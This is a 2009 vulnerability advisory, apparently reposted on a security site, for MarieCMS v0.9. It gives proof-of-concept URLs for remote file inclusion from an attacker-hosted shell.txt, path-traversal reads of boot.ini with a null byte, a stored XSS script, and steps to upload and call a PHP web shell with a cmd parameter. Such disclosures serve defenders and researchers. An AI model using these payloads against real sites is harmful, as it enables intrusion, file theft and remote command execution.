MarieCMS 0.9 LFI RFI XSS

2009.12.09
Credit: Amol Naik
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################################ Mutliple Vulnerabilities in MarieCMS v0.9 Name Multiple vulnerabilities in MarieCMS Systems Affected MarieCMS v0.9 Download http://sourceforge.net/projects/mariecms/files/MarieCMS/MarieCMS%200.9/mariecmsv0.9.zip/download Author Amol Naik (amolnaik4[at]gmail.com) Date 07/12/2009 ################################################################################ ############ OVERVIEW ############ MarieCMS v0.9 vulnerable to following issues: ++ Remote File Inclusion ++ Local File Inclusion ++ Persistent XSS ++ Shell Upload (Authenticated User) ###################### PoC ###################### # Remote File Inclusion: ++++++++++++++++++++++++ http://localhost/mariecms/?page=http://[attacker]/[site]/shell.txt? # Local File Inclusion: +++++++++++++++++++++++ http://localhost/mariecms/?mod=../../../../../../../../../../boot.ini%00 http://localhost/mariecms/admin/index.php?mod=../../../../../../../../../../../../boot.ini%00 # Persistent XSS: +++++++++++++++++ Put <script>alert("XSS")</script> in "Name" field on page http://localhost/mariecms/?page=addgb&mod=gaestebuch # Shell Upload (Authenticated User): +++++++++++++++ 1. Rename shell.php to shell.jpg.php 2. Upload it into galleryupload section. 3. View images to get image id for shell.jpg.php 4. Access shell: http://[server]/[path]/_images/[image_id].php?cmd=dir ############ TimeLine ############ Bug discovered : 26/11/2009 Informed Vendor : 30/11/2009 -- No reply received from vendor till the date Public Disclosure : 02/12/2009


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top